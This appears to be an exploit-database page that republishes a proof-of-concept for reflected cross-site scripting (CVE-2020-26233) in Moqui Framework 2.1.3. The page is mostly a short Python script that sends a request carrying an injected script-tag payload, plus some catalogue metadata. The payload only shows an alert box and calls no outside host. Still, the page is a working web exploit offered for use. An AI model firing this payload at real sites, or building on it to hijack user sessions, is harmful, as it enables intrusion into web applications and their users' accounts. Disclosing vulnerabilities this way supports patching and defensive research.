Moqui Framework 2.1.3 - Reflected Cross Site Scripting

CVE Category Price Severity
CVE-2020-26233 CWE-79 Not specified High
Author Risk Exploitation Type Date
Unknown High Remote 2022-07-24
Our sensors found this exploit at:

Below is a copy:

Moqui Framework 2.1.3 - Reflected Cross Site Scripting
# Exploit Author: Maximus Decimus or [email protected]
# Software Link:
# Vendor Homepage:
# Tested on: Windows 10


# Description : This framework is vulnerable to xss attack due to the lack of proper input filtering
# for more information , check out this page :


# POC : 
# Set the target url and run the following python script

import requests

url_string = ";<script>alert(1)</script>test1337"
request_headers = {"Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en-US;q=0.9,en;q=0.8", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36", "Connection": "close", "Cache-Control": "max-age=0"}
requests.get(url_string, headers=request_headers)

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.